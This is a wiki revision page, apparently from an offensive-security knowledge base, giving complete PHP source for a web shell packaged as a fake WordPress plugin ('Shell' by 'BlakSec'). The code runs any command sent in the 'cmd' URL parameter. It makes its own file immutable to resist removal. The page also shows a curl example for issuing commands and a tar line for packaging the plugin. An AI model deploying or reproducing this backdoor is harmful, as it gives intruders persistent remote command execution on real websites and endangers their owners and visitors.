Difference between revisions of "WordPress Plugin - shell.php (variant 1)"
m |
m |
||
Line 38: | Line 38: | ||
?> | ?> | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | Now just tar it up and it's ready to go | ||
+ | <syntaxhighlight lang=shell-session highlight="" line> | ||
+ | tar -zcvf ./shell.tgz shell.php | ||
</syntaxhighlight> | </syntaxhighlight> |
Revision as of 09:31, 15 May 2018
The following file can be used as WordPress plugin or geneneric system call interface. Commands should be url-encoded, passed via 'cmd' param.
E.g.
curl -G "http://192.168.56.103/wp-content/plugins/shell1/shell.php" --data-urlencode "cmd=ls -altrh"
<?php
/**
* @package My_Shell
* @version 1.0
*/
/*
Plugin Name: Shell
Plugin URL: http://google.com
Description: A quick shell plugin
Author: BlakSec
Version: 1.0
*/
# prevent file deletion
$myfile = __FILE__;
system("chmod ugo-w $myfile");
system("chattr +i $myfile");
$command=urldecode($_GET["cmd"]);
if (class_exists('ReflectionFunction')) {
$function = new ReflectionFunction('system');
$function->invoke($command);
} elseif (function_exists('call_user_func_array')) {
call_user_func_array('system', array($command));
} elseif (function_exists('call_user_func')) {
call_user_func('system', $command);
} else {
system($command);
}
?>
Now just tar it up and it's ready to go
tar -zcvf ./shell.tgz shell.php